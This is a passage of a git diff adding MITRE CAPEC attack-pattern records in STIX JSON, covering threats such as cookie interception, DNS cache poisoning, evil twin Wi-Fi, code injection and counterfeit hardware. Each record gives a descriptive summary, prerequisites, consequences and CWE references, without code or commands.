messaging within the user interface.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/533.html", + "external_id": "CAPEC-533" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html", + "external_id": "CWE-494" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the download and update installation processes.", + "Advanced knowledge about the deployed system and its various software subcomponents and processes." + ], + "x_capec_skills_required": { + "High": "Able to develop malicious code that can be used on the victim's system while maintaining normal functionality." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb.json b/capec/attack-pattern/attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb.json new file mode 100644 index 0000000000..927e62fc19 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb.json @@ -0,0 +1,126 @@ +{ + "type": "bundle", + "id": "bundle--a103d9ed-8d27-41c0-9290-e746b522ebfe", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Accessing/Intercepting/Modifying HTTP Cookies", + "description": "This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie's content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/31.html", + "external_id": "CAPEC-31" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html", + "external_id": "CWE-565" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html", + "external_id": "CWE-113" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html", + "external_id": "CWE-539" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html", + "external_id": "CWE-315" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html", + "external_id": "CWE-472" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/724.html", + "external_id": "CWE-724" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html", + "external_id": "CWE-642" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the man in the middle attack relies on a network sniffer, proxy, or other intermediary to intercept the subject's credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the adversary to accomplish if no other protection mechanisms are in place. See also: CVE-2010-5148 , CVE-2016-0353" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target server software must be a HTTP daemon that relies on cookies.", + "The cookies must contain sensitive information.", + "The adversary must be able to make HTTP requests to the server, and the cookie must be contained in the reply." + ], + "x_capec_resources_required": [ + "A utility that allows for the viewing and modification of cookies. Many modern web browsers support this behavior." + ], + "x_capec_skills_required": { + "High": "Exploiting a remote buffer overflow generated by attack", + "Low": "To overwrite session cookie data, and submit targeted attacks via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938.json b/capec/attack-pattern/attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938.json new file mode 100644 index 0000000000..9fe7d3698e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--ba8ac702-f2e8-4539-bf1e-68335d4b0c01", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Influence Perception of Authority", + "description": "An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/421.html", + "external_id": "CAPEC-421" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_example_instances": [ + "The adversary calls the target and announces that he is the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and he/she needs the target's login credentials for their account. By convincing the target of his/her authority, the adversary hopes the target will reveal the sensitive information." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bd9af4e2-684c-4c12-a724-5df0ff53ac5f.json b/capec/attack-pattern/attack-pattern--bd9af4e2-684c-4c12-a724-5df0ff53ac5f.json new file mode 100644 index 0000000000..5e376afd81 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bd9af4e2-684c-4c12-a724-5df0ff53ac5f.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8fb5bf10-cff2-490b-99c0-2d00901316ec", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bd9af4e2-684c-4c12-a724-5df0ff53ac5f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit Organizations", + "description": "An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/544.html", + "external_id": "CAPEC-544" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bda278fb-3efc-4ff9-8b78-465a44374365.json b/capec/attack-pattern/attack-pattern--bda278fb-3efc-4ff9-8b78-465a44374365.json new file mode 100644 index 0000000000..0c83d7be9e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bda278fb-3efc-4ff9-8b78-465a44374365.json @@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--bcb7e6a3-c459-4de6-aca0-ff118e858ed3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bda278fb-3efc-4ff9-8b78-465a44374365", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html", + "external_id": "CAPEC-324" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132.json b/capec/attack-pattern/attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132.json new file mode 100644 index 0000000000..d4ab946a69 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132.json @@ -0,0 +1,91 @@ +{ + "type": "bundle", + "id": "bundle--530236c8-581b-4fd8-bc73-5e3d5f672046", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DNS Cache Poisoning", + "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/142.html", + "external_id": "CAPEC-142" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html", + "external_id": "CWE-348" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html", + "external_id": "CWE-349" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html", + "external_id": "CWE-441" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html", + "external_id": "CWE-350" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning", + "external_id": "REF-22" + }, + { + "source_name": "reference_from_CAPEC", + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "url": "http://www.dnssec.net/dns-threats.php", + "external_id": "REF-23" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Vulnerability Note VU#800113, 2008--07---08, US CERT", + "url": "http://www.kb.cert.org/vuls/id/800113#pat", + "external_id": "REF-27" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions." + ], + "x_capec_resources_required": [ + "The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted DNS cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823.json b/capec/attack-pattern/attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823.json new file mode 100644 index 0000000000..da04d0f48c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a2eb8d19-9046-473e-841d-9687608fb587", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bded7a75-5d5c-4d00-b403-d840f6631823", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Probe Application Memory", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html", + "external_id": "CAPEC-546" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf", + "external_id": "REF-461" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55.json b/capec/attack-pattern/attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55.json new file mode 100644 index 0000000000..ae768388cd --- /dev/null +++ b/capec/attack-pattern/attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--36a62fc1-a2ed-40f0-8e4b-532e9f02ba48", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Code Injection", + "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/242.html", + "external_id": "CAPEC-242" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html", + "external_id": "CWE-94" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff.json b/capec/attack-pattern/attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff.json new file mode 100644 index 0000000000..c3072e3a79 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--69e4e5e2-e78c-4ca7-abd9-d5a0ece00bc8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Evil Twin Wi-Fi Attack", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to act as a \"man-in-the-middle\" for all communications.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/615.html", + "external_id": "CAPEC-615" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control Wi-Fi data communications to/from mobile device.)" + ] + }, + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--bfd71981-161f-4a77-9ebc-51e9cb290b38.json b/capec/attack-pattern/attack-pattern--bfd71981-161f-4a77-9ebc-51e9cb290b38.json new file mode 100644 index 0000000000..c0007077ac --- /dev/null +++ b/capec/attack-pattern/attack-pattern--bfd71981-161f-4a77-9ebc-51e9cb290b38.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--9276d51a-6028-4c80-9c47-262daaec3bb8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--bfd71981-161f-4a77-9ebc-51e9cb290b38", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Infrastructure-based footprinting", + "description": "This attack pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the meta level pattern CAPEC-169 : going forward, or to any of its children patterns.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/289.html", + "external_id": "CAPEC-289" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c03f9135-5567-4f2e-bb34-037eaa403f5f.json b/capec/attack-pattern/attack-pattern--c03f9135-5567-4f2e-bb34-037eaa403f5f.json new file mode 100644 index 0000000000..299ee52fbd --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c03f9135-5567-4f2e-bb34-037eaa403f5f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--7a1358c3-69ea-4b40-92e6-40432f01eb11", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c03f9135-5567-4f2e-bb34-037eaa403f5f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Overread Buffers", + "description": "An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/540.html", + "external_id": "CAPEC-540" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html", + "external_id": "CWE-125" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Depending on the use of the target buffer, an application or system crash can be achieved.)" + ], + "Confidentiality": [ + "Read Data (By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c08ad405-5e65-48bb-ad68-5dcb118f0f68.json b/capec/attack-pattern/attack-pattern--c08ad405-5e65-48bb-ad68-5dcb118f0f68.json new file mode 100644 index 0000000000..4f0084a114 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c08ad405-5e65-48bb-ad68-5dcb118f0f68.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--638ba2f4-5d7f-47cf-985b-fbdfc7c4c999", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c08ad405-5e65-48bb-ad68-5dcb118f0f68", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Counterfeit Hardware Component Inserted During Product Assembly", + "description": "An attacker with either direct access to the product assembly process or to the supply of subcomponents used in the product assembly process introduces counterfeit hardware components into product assembly. The assembly containing the counterfeit components results in a system specifically designed for malicious purposes.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/520.html", + "external_id": "CAPEC-520" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "A manufacturer of a firewall system requires a hardware card which functions as a multi-jack ethernet card with four ethernet ports. The attacker constructs a counterfeit card that functions normally except that packets from the attacker's network are allowed to bypass firewall processing completely. Once deployed at a victim location, this allows the attacker to bypass the firewall unrestricted." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate manufacturer or manufacturer's supplier." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c09ea7a3-e494-4d13-85cd-edbd5f2d03e4.json b/capec/attack-pattern/attack-pattern--c09ea7a3-e494-4d13-85cd-edbd5f2d03e4.json new file mode 100644 index 0000000000..e6e658ab47 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c09ea7a3-e494-4d13-85cd-edbd5f2d03e4.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--7d894ffe-0143-4f14-8c71-fd755d003cda", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c09ea7a3-e494-4d13-85cd-edbd5f2d03e4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash File Overlay", + "description": "An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/181.html", + "external_id": "CAPEC-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html", + "external_id": "CWE-1021" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.", + "The victim's browser must support invisible Flash overlays." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the Flash overlay over the decoy content." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c0b51030-b2f4-4d4a-9de0-06dea9a929ba.json 